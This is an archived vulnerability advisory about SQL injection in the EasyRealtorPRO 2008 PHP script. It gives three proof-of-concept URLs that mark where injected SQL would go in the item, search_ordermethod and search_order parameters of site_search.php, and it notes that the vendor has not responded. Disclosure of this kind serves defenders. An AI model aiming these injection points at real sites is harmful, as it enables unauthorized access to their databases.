AOH :: HP Unsorted S :: VA1387.HTM

SQL Injection in EasyRealtorPRO 2008



SQL Injection in EasyRealtorPRO 2008
SQL Injection in EasyRealtorPRO 2008



Original article:
http://www.davidsopas.com/2008/09/sql-injection-in-easyrealtorpro/ 


"EasyRealtorPRO 2008 provides you with all features you need to setup
your own business oriented real estate website on your own domain
name. Our support team will install the script on your server and then
you can start selling packages to home sellers at ease." in vendor
website easyrealtorpro.com

This PHP script is vulnerable to SQL Injection in site_search.php file.

Manipulating the unfiltred variables, a user can execute SQL commands
to gather other information. The problem is located under the
variables item, search_ordermethod and search_order.

Proof of concept:

site_search.php?search_purpose=sale&search_type=&
search_price_min=&search_price_max=&search_bedroom=1&
search_bathroom=1&search_city=&search_state=&
search_zip=&search_radius=&search_country=&
search_order=type&search_ordermethod=asc&page=2&
item=5'SQL INJECTION

site_search.php?search_purpose=sale&search_type=&
search_price_min=&search_price_max=&search_bedroom=1&
search_bathroom=1&search_city=&search_state=&
search_zip=&search_radius=&search_country=&
search_order=type&search_ordermethod=asc'SQL INJECTION&
page=2&item=5

site_search.php?search_purpose=sale&search_type=&
search_price_min=&search_price_max=&search_bedroom=1&
search_bathroom=1&search_city=&search_state=&
search_zip=&search_radius=&search_country=&
search_order=type'SQL INJECTION&search_ordermethod=asc&
page=2&item=5

Solution: The vendor was contacted 2 weeks ago and still not reply to
my email. It can be fixed with the sanitize of the variables.

The entire AOH site is optimized to look best in Firefox® 3 on a widescreen monitor (1440x900 or better).
Site design & layout copyright © 1986-2014 AOH
We do not send spam. If you have received spam bearing an artofhacking.com email address, please forward it with full headers to abuse@artofhacking.com.